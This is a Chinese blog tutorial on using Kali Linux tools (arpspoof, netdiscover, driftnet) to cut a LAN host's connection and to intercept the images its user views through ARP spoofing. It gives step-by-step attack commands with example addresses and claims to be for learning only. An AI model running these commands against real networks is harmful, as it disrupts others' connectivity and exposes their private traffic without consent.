使用kali进行ARP攻击与欺骗

ARP攻击与欺骗

ARP攻击

一、arpspoof安装
   arpspoof 工具在dsniff中,故kali安装时在root模式下安装dsniff就可。

    apt-get install dsniff

在这里插入图片描述
  安装成功后输入arpspoof如果现实版本信息,代表安装成功。
在这里插入图片描述
二、断网攻击
  1、首先检查自己的网卡信息。

        ifconfig -a

在这里插入图片描述
 2、确定目标IP

    fping -g 网段/24

在这里插入图片描述
  这种方式可以查看活动主机,但无法获取mac地址等信息,建议用netdiscover,命令如下:(如果未扫描到,可以直接用netdiscover命令,或更改24为16或8,具体由自己的子网掩码确定,但个人子网掩码C类,用/24时出结果较慢,/16或不指定范围时较快,不清楚为啥,知道的朋友可以留言告知)

	netdiscover -r 网段/24

在这里插入图片描述
 3、进行攻击

	arpspoof -i 自己网卡信息 -t 目标IP -r 网关
	例:arpspoof -i eth0  -t  192.168.1.21 -r 192.168.1.1

在这里插入图片描述

ARP欺骗

一、开启IP转发

	echo 1 >/proc/sys/net/ipv4/ip_forward

二、进行arp攻击

	arpspoof -i eth0 -t targetIP -r gateway(具体参考上面)

三、安装driftnet进行查看
  driftnet可用于获取目标IP游览的图片,在root模式下输入如下命令。

	apt-get install driftnet

  安装完成后,运行:

	driftnet -i 你的网卡
例:driftnet -i eth0

四、实例

	echo 1 >/proc/sys/net/ipv4/ip_forward
	arpspoof -i eth0 -t 192.168.1.21 -r 192.168.1.1
	driftnet -i eth0

在这里插入图片描述
  如果需要保存某张图片可以更改临时缓存文件,选择想要图片,保存到其他路径下,否则driftnet 关闭,缓存将被清除。

	driftnet -i 网卡 -d 临时缓存路径
例:driftnet -i eth0 -d /home/kali/one

  如果kali在虚拟机里,先把网卡连接到虚拟机里
在这里插入图片描述
注:本文仅供个人学习研究

  • 19
    点赞
  • 151
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

风云小虾米

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值